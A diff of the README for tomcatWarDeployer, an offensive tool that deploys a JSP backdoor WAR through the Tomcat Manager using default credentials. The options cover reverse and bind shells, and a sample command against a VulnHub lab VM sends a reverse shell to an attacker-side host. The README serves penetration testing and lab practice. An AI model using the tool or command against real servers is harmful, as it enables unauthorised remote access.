mgeeky/tomcatWarDeployer/README.md

 Options:
-  -h, --help            show this help message and exit -R APPNAME, --remove=APPNAME
+  -h, --help            show this help message and exit

+  General options:
+    -v, --verbose       Verbose mode.
+    -G OUTFILE, --generate=OUTFILE
+                        Generate JSP backdoor only and put it into specified outfile path then exit.
+Do not perform any connections, scannings, deployment and so on.
+    -U USER, --user=USER
+                        Tomcat Manager Web Application HTTP Auth username.
+                        Default="tomcat"
+    -P PASS, --pass=PASS
+                        Tomcat Manager Web Application HTTP Auth password.
+                        Default="tomcat"

+  Connection options:
+    -H RHOST, --host=RHOST
+                        Remote host for reverse tcp payload connection.
+When specified, RPORT must be specified too.
+Otherwise, bind tcp payload will be deployed listening on 0.0.0.0 -p PORT, --port=PORT
+                        Remote port for the reverse tcp payload when used with RHOST or Local port if no RHOST specified thus acting as a Bind shell endpoint.
+    -u URL, --url=URL   Apache Tomcat management console URL.
+Default:
+                        /manager/

+  Payload options:
+    -R APPNAME, --remove=APPNAME
                         Remove deployed app with specified name.
-Can be used for post-assessment cleaning -X PASSWORD, --shellpass=PASSWORD
+Can be used for post-assessment cleaning
+    -X PASSWORD, --shellpass=PASSWORD
                         Specifies authentication password for uploaded shell,
                         to prevent unauthenticated usage.
 Default: randomly
                         generated.
 Specify "None" to leave the shell unauthenticated.
     -t TITLE, --title=TITLE
                         Specifies head>title for uploaded JSP WAR payload.
                         Default: "JSP Application"
     -n APPNAME, --name=APPNAME
                         Specifies JSP application name.
+Default: "jsp_app"
-Default: "jsp_app" -x, --unload          Unload existing JSP Application with the same name.
+    -x, --unload        Unload existing JSP Application with the same name.
                         Default: no.
     -C, --noconnect     Do not connect to the spawned shell immediately.
-By
-                        default this program will connect to the spawned shell, specifying this option let's you use other handlers like Metasploit, NetCat and so on.
+By default this program will connect to the spawned shell, specifying this option let's you use other handlers like Metasploit, NetCat and so on.
     -f WARFILE, --file=WARFILE
                         Custom WAR file to deploy.
 By default the script will generate own WAR file on-the-fly.

-  General options:
-    -v, --verbose       Verbose mode.
-    -U USER, --user=USER
-                        Tomcat Manager Web Application HTTP Auth username.
-                        Default="tomcat"
-    -P PASS, --pass=PASS
-                        Tomcat Manager Web Application HTTP Auth password.
-                        Default="tomcat"
 ```

 And sample usage on [Kevgir 1 VM by canyoupwn.me](https://www.vulnhub.com/entry/kevgir-1,137/) running at 192.168.56.100:8080 :

 ```
 user$ python tomcatWarDeployer.py -C -x -v -H 192.168.56.101 -p 4545 -n shell 192.168.56.100:8080